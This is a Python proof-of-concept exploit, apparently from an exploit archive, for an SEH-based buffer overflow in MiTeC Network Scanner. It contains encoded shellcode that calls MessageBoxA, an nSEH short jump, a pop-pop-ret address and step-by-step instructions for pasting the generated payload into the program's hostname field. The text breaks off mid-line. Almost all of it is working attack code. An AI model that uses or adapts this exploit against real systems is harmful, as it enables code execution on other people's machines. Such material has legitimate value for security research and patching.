#!/usr/bin/python # -*- coding: utf-8 -*- ### Network Scanner Version - SEH Overflow Exploit by n30m1nd ### # Date: 2016-10-21 # Exploit Author: n30m1nd # Exploit Title: Network Scanner Version SEH Based Exploit # Vendor Homepage: http://www.mitec.cz/ # Software Link: https://www.exploit-db.com/apps/8a419b10772d811ce5eea44cb88ae55b-NetScan.zip # Version: # Tested on: Win7 64bit and Win10 64 bit # Credits # ======= # PoC by: INSECT.B - http://binsect00.tistory.com # https://www.exploit-db.com/exploits/39447/ # Shouts to the crew at Offensive Security for their huge efforts on making the infosec community better # How to # ====== # * Run this python script. It will generate an "exploit.txt" file. # * Copy the contents and, in the program, go to the "TOOLS" tab then click on "Detect IP from hostname" and paste the contents # * MessageBoxA is called on an infinite loop since the exception handler is triggered all the time # Exploit code # ============ import struct # MessageBoxA in NetScan.exe => 004042F1 mbox = ( "\x25\x41\x41\x41" "\x41\x25\x32\x32" "\x32\x32\x50\x68" "\x70\x77\x6E\x64" "\x54\x5F\x50\x57" "\x57\x50\x35\x8E" "\x60\x60\x55\x35" "\x7F\x22\x20\x55" "\x50\xC3" ) # JUMP BACK to our shellcode! nseh = ( # xor al,51h; Sets the ZF = 0 (We have to be very unlucky for eax to end in 51h) "\x34\x51" # jne -32h; Jump if ZF = 0 "\x75\xCC" ) # pop pop ret => 00402E67 sehh = struct.pack("